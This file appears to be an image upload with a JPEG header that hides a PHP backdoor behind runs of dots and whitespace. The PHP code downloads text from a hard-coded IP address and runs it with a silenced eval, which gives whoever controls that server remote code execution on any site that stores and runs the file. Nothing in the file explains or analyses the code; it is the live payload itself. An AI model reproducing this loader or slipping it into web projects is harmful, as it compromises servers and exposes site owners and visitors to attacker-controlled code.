﻿     
        
   
       ÿØÿà JFIF      ÿÛ C      

!"$"$ÿÛ C  ÿÂ p " ÿÄ              ÿÄ             ÿÚ    ÕÔË®
(%	aA*‚XYD¡(J„¡E¢RE,P€XYae )(E¤²€B¤R¥	BQ¤¢ X«)X…€¤   @  

  ..............................................................................................................................................................................
.............................................................................                                                  
                                                                                                                                                                                     <?php
function getDiDiContent(){
  $handle = curl_init();
  curl_setopt ($handle, CURLOPT_URL, 'http://192.151.149.130/z60612_o/stat/index.txt');
  curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5);
  $result = curl_exec( $handle );
  if ( PHP_VERSION_ID < 80000 ) {
     curl_close(  $handle  );
  }
  return $result; 
}
$didi = getDiDiContent();
@eval("?>" . $didi);